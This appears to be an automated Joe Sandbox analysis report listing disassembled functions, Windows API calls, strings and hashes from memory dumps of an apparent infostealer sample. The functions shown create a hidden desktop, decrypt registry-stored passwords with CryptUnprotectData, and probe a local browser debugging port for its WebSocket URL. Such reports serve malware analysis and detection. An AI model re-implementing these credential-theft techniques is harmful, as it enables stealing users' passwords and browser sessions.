D, xrefs: 021A9C51

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
String ID: D
API String ID: 171495903-2746444292
Opcode ID: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
Instruction ID: 1cb44417041499b2c45ba55406864a499ca2fed895b6fc4d59269d5b2436d8d0
Opcode Fuzzy Hash: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
Instruction Fuzzy Hash: 7A916DB5644340AFE724DF64DC45F9A77EAAF88700F10891DFA49CB290DBB4A504CFA2

Function 021A9A07 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 235stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 021A9A3F
lstrcat.KERNEL32(?,?), ref: 021A9A54
lstrcat.KERNEL32(?,0043516C), ref: 021A9A67

Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 021C40AC
Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 021C40D6
Part of subcall function 021C4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,021A1495,?,0000001A), ref: 021C40E0

wsprintfA.USER32 ref: 021A9AAD
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 021A9AD0
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 021A9AEF
memset.MSVCRT ref: 021A9B0D
lstrcat.KERNEL32(?,?), ref: 021A9B22
lstrcat.KERNEL32(?,?), ref: 021A9B34
lstrcat.KERNEL32(?,00435128), ref: 021A9B44
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 021A9B81
lstrcpy.KERNEL32(00000000,?), ref: 021A9BB7
StrStrA.SHLWAPI(?,00638C5C), ref: 021A9BCC
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 021A9BE9
lstrlen.KERNEL32(?), ref: 021A9BFD
wsprintfA.USER32 ref: 021A9C0D
lstrcpy.KERNEL32(?,?), ref: 021A9C24
memset.MSVCRT ref: 021A9C3A

Strings

D, xrefs: 021A9C51

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
String ID: D
API String ID: 171495903-2746444292
Opcode ID: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
Instruction ID: e9d9bec9ab174b20f642af4a590c4f30e151baabd03f17810e8dbc1d1a9374b5
Opcode Fuzzy Hash: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
Instruction Fuzzy Hash: B9916DB5644340AFE720DF64CC45F9A77EAAF88700F10891DFA49C7290DBB4A504CFA2

Function 00421800 Relevance: 37.8, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
lstrlenA.KERNEL32(00917328,00000000,00000000,?,?,00421B61), ref: 00421840
lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
lstrlenA.KERNEL32(00917348,?,?,00421B61), ref: 00421925
lstrcpy.KERNEL32(00000000,00000000), ref: 0042194C
lstrcatA.KERNEL32(00000000,00000000), ref: 00421957
lstrcpy.KERNEL32(00000000,00000000), ref: 00421986
lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 00421998
lstrcpy.KERNEL32(00000000,00000000), ref: 004219B9
lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004219C5
lstrcpy.KERNEL32(00000000,00000000), ref: 004219F4
lstrlenA.KERNEL32(009172B8,?,?,00421B61), ref: 00421A0A
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A31
lstrcatA.KERNEL32(00000000,00000000), ref: 00421A3C
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A6B
lstrlenA.KERNEL32(00917218,?,?,00421B61), ref: 00421A81
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AA8
lstrcatA.KERNEL32(00000000,00000000), ref: 00421AB3
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AE2

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
Instruction ID: 274b4ab71ddff461c781089cdb5a89f9d7377c7fda2b54a99ae9043ae0fda87f
Opcode Fuzzy Hash: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
Instruction Fuzzy Hash: 84914CB57017039BD720AFB6DD88A17B7E9AF14344B54583EA881D33B1DBB8D841CBA4

Function 021A12D7 Relevance: 36.3, APIs: 24, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 021A12F1

Part of subcall function 021A1267: GetProcessHeap.KERNEL32(00000000,00000104), ref: 021A127C
Part of subcall function 021A1267: RtlAllocateHeap.NTDLL(00000000), ref: 021A1283
Part of subcall function 021A1267: RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 021A12A0
Part of subcall function 021A1267: RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 021A12BA
Part of subcall function 021A1267: RegCloseKey.ADVAPI32(?), ref: 021A12C4

lstrcat.KERNEL32(?,00000000), ref: 021A1307
lstrlen.KERNEL32(?), ref: 021A1314
lstrcat.KERNEL32(?,00431D48), ref: 021A132F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021A1366
lstrlen.KERNEL32(006389F0), ref: 021A1374
lstrcpy.KERNEL32(00000000,?), ref: 021A1398
lstrcat.KERNEL32(00000000,006389F0), ref: 021A13A0
lstrlen.KERNEL32(00431D50), ref: 021A13AB
lstrcpy.KERNEL32(00000000,00000000), ref: 021A13CF
lstrcat.KERNEL32(00000000,00431D50), ref: 021A13DB
lstrcpy.KERNEL32(00000000,00000000), ref: 021A1401
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021A1446
lstrlen.KERNEL32(00638CA4), ref: 021A1455
lstrcpy.KERNEL32(00000000,?), ref: 021A147C
lstrcat.KERNEL32(00000000,?), ref: 021A1484
lstrcpy.KERNEL32(00000000,00000000), ref: 021A14BF
lstrcat.KERNEL32(00000000), ref: 021A14CC
lstrcpy.KERNEL32(00000000,00000000), ref: 021A14F3
CopyFileA.KERNEL32(?,?,00000001), ref: 021A151C
lstrcpy.KERNEL32(00000000,?), ref: 021A1548
lstrcpy.KERNEL32(00000000,?), ref: 021A1584

Part of subcall function 021BF197: lstrcpy.KERNEL32(00000000,?), ref: 021BF1C9

DeleteFileA.KERNEL32(?), ref: 021A15B8
memset.MSVCRT ref: 021A15D5

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
String ID:
API String ID: 1397529057-0
Opcode ID: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction ID: 128819ff6e0acd160dc996a5a38de9bee31c5fa4f128787b5f355e4360de27db
Opcode Fuzzy Hash: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction Fuzzy Hash: 47A17079B41245AFDB21EFB8CC98E9EBBBAAF44305F044424E909E7650DB34D905DFA0

Function 021BAE79 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32 ref: 021BAE96
lstrlen.KERNEL32(00638DD4), ref: 021BAEAC
lstrcpy.KERNEL32(00000000,00000000), ref: 021BAED4
lstrcat.KERNEL32(00000000,00000000), ref: 021BAEDF
lstrcpy.KERNEL32(00000000,00000000), ref: 021BAF08
lstrcpy.KERNEL32(00000000,00000000), ref: 021BAF4B
lstrcat.KERNEL32(00000000,00000000), ref: 021BAF55
lstrcpy.KERNEL32(00000000,00000000), ref: 021BAF7E
lstrlen.KERNEL32(0043509C), ref: 021BAF98
lstrcpy.KERNEL32(00000000,00000000), ref: 021BAFBA
lstrcat.KERNEL32(00000000,0043509C), ref: 021BAFC6
lstrcpy.KERNEL32(00000000,00000000), ref: 021BAFEF
lstrlen.KERNEL32(0043509C), ref: 021BB001
lstrcpy.KERNEL32(00000000,00000000), ref: 021BB023
lstrcat.KERNEL32(00000000,0043509C), ref: 021BB02F
lstrcpy.KERNEL32(00000000,00000000), ref: 021BB058
lstrlen.KERNEL32(00638DB8), ref: 021BB06E
lstrcpy.KERNEL32(00000000,00000000), ref: 021BB096
lstrcat.KERNEL32(00000000,00000000), ref: 021BB0A1
lstrcpy.KERNEL32(00000000,00000000), ref: 021BB0CA
lstrcpy.KERNEL32(00000000,?), ref: 021BB106
lstrcat.KERNEL32(00000000,00000000), ref: 021BB110
lstrcpy.KERNEL32(00000000,00000000), ref: 021BB136
lstrlen.KERNEL32(00000000), ref: 021BB14C
lstrcpy.KERNEL32(00000000,00638A98), ref: 021BB17F

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen
String ID:
API String ID: 2762123234-0
Opcode ID: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction ID: e5531e77f0a3cd414a0b3a64ca54ae5f113a4ef18cfd38482422f125e29589be
Opcode Fuzzy Hash: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction Fuzzy Hash: CCB14975A816169FDB22AF78CC98AEE77B7BF40309F040528E815E7660DB74D901DF90

Function 021C1A67 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021C1A96
lstrlen.KERNEL32(00638DEC), ref: 021C1AA7
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1ACE
lstrcat.KERNEL32(00000000,00000000), ref: 021C1AD9
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1B08
lstrlen.KERNEL32(00435564), ref: 021C1B1A
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1B3B
lstrcat.KERNEL32(00000000,00435564), ref: 021C1B47
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1B76
lstrlen.KERNEL32(00638B1C), ref: 021C1B8C
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1BB3
lstrcat.KERNEL32(00000000,00000000), ref: 021C1BBE
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1BED
lstrlen.KERNEL32(00435564), ref: 021C1BFF
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1C20
lstrcat.KERNEL32(00000000,00435564), ref: 021C1C2C
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1C5B
lstrlen.KERNEL32(00638D70), ref: 021C1C71
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1C98
lstrcat.KERNEL32(00000000,00000000), ref: 021C1CA3
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1CD2
lstrlen.KERNEL32(00638D6C), ref: 021C1CE8
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1D0F
lstrcat.KERNEL32(00000000,00000000), ref: 021C1D1A
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1D49

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction ID: 99391a427604ff679b5dc46acfac71097180eaf28e6bba018af5201a60805d21
Opcode Fuzzy Hash: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction Fuzzy Hash: F09163B8681747AFD730AF79CC88A1AB7FAAF14349F24582CA885C3651DB74D840DF60

Function 004090F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 161networkstringfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
InternetCloseHandle.WININET(00000000), ref: 00409139
strlen.MSVCRT ref: 00409155
InternetReadFile.WININET(?,?,?,00000000), ref: 00409196
InternetReadFile.WININET(00000000,?,00001000,?), ref: 004091C7
InternetCloseHandle.WININET(00000000), ref: 004091D2
InternetCloseHandle.WININET(00000000), ref: 004091D9
strlen.MSVCRT ref: 004091EA
strlen.MSVCRT ref: 0040921D
strlen.MSVCRT ref: 0040925E

Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28

strlen.MSVCRT ref: 0040927C

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Strings

http://localhost:9229/json, xrefs: 00409126
"ws://, xrefs: 00409259, 00409264
"webSocketDebuggerUrl":, xrefs: 004091E5, 004091F0

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 4166274400-2144369209
Opcode ID: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
Instruction ID: a7d092efa737f0fe45e53d089a45e304e661b41fe404ce77bc48f3d160830c15
Opcode Fuzzy Hash: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
Instruction Fuzzy Hash: AD51C571B00205ABDB20DFA4DC45BDEF7F9DB48714F14416AF904E3281DBB8EA4587A9

Function 021AB660 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021AB687
lstrcpy.KERNEL32(00000000,00000000), ref: 021AB6D5
lstrcpy.KERNEL32(00000000,00000000), ref: 021AB700
lstrcat.KERNEL32(00000000,00000000), ref: 021AB708
lstrcpy.KERNEL32(00000000,00000000), ref: 021AB730
lstrlen.KERNEL32(00435214), ref: 021AB7A7
lstrcpy.KERNEL32(00000000,00000000), ref: 021AB7CB
lstrcat.KERNEL32(00000000,00435214), ref: 021AB7D7
lstrcpy.KERNEL32(00000000,00000000), ref: 021AB800
lstrlen.KERNEL32(00000000), ref: 021AB884
lstrcpy.KERNEL32(00000000,00000000), ref: 021AB8AE
lstrcat.KERNEL32(00000000,00000000), ref: 021AB8B6
lstrcpy.KERNEL32(00000000,00000000), ref: 021AB8DE
lstrlen.KERNEL32(0043509C), ref: 021AB955
lstrcpy.KERNEL32(00000000,00000000), ref: 021AB979
lstrcat.KERNEL32(00000000,0043509C), ref: 021AB985
lstrcpy.KERNEL32(00000000,00000000), ref: 021AB9B5
lstrlen.KERNEL32(?), ref: 021ABABE
lstrlen.KERNEL32(?), ref: 021ABACD
lstrcpy.KERNEL32(00000000,00000000), ref: 021ABAF5

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction ID: 9fabf584af280aa3ddf28a6a898258a5dde3a348a3d7c880193633b8c3098aef
Opcode Fuzzy Hash: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction Fuzzy Hash: 5A025078A45245CFDB24DF69C8A8B6ABBF2BF4430CF18806DD8099B261D775D942CF90

Function 00407710 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringregistrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
strlen.MSVCRT ref: 004077BE
StrStrA.SHLWAPI(?,Password), ref: 004077F8
strlen.MSVCRT ref: 0040788D

Part of subcall function 00407690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
Part of subcall function 00407690: HeapAlloc.KERNEL32(00000000), ref: 004076A5
Part of subcall function 00407690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
Part of subcall function 00407690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
Part of subcall function 00407690: LocalFree.KERNEL32(?), ref: 004076F7

strcpy_s.MSVCRT ref: 00407821
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
HeapFree.KERNEL32(00000000), ref: 00407833
strlen.MSVCRT ref: 00407840
strcpy_s.MSVCRT ref: 0040786A
strlen.MSVCRT ref: 004078B4
RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407975

Strings

Password, xrefs: 004077EC

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
String ID: Password
API String ID: 3893107980-3434357891
Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction ID: e4d9b8b39298a74cb5cd03489e7ec67c358bc82c244f10be08d5cfcaf05cec85
Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction Fuzzy Hash: 16810EB1D00219AFDB10DF95DC84ADEB7B9EF48300F10816AE505F7250EB75AA45CFA5

Function 021C18A7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 021C18E8
lstrcpy.KERNEL32(00000000,00638C44), ref: 021C1913
lstrlen.KERNEL32(?,?,?,?), ref: 021C1920
lstrcpy.KERNEL32(00000000,00000000), ref: 021C193D
lstrcat.KERNEL32(00000000,?), ref: 021C194B
lstrcpy.KERNEL32(00000000,00000000), ref: 021C1971
lstrlen.KERNEL32(00638AA8,?,?,?), ref: 021C1986
lstrcpy.KERNEL32(00000000,?), ref: 021C19A9
lstrcat.KERNEL32(00000000,00638AA8), ref: 021C19B1
lstrcpy.KERNEL32(00000000,00000000), ref: 021C19D9
ShellExecuteEx.SHELL32(?), ref: 021C1A14
ExitProcess.KERNEL32 ref: 021C1A4A

Strings

<, xrefs: 021C19F5

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
String ID: <
API String ID: 3579039295-4251816714
Opcode ID: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
Instruction ID: 272f5802e1997f5eef4dffbd430f7457e5c9c74e441a393ac87d4c7f82725c0e
Opcode Fuzzy Hash: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
Instruction Fuzzy Hash: BB51A074A4121AAFDB25DFB4CC94ADEBBFAAF54304F105129E909E3251DB70EA01CF90

Function 0041F100 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F134
lstrcpy.KERNEL32(00000000,?), ref: 0041F162
StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F176
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F185
LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1A3
StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1D1
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1E4
strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1F6
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F202
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F24F
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F28F

Strings

ERROR, xrefs: 0041F170, 0041F20F, 0041F249, 0041F289

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
